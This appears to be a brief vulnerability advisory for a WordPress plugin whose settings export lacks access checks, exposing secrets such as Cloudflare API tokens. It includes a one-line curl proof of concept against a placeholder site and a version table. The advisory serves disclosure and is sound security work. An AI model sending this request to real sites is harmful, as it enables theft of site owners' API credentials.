Description The plugin does not prevent users from exporting the plugin’s settings, which may include sensitive information such as Cloudflare API tokens.
curl --url ‘http://vulnerable-site.tld/wp-admin/admin-post.php?luv-action=export’
CPE | Name | Operator | Version |
---|---|---|---|
eq | 2.3.6.15 |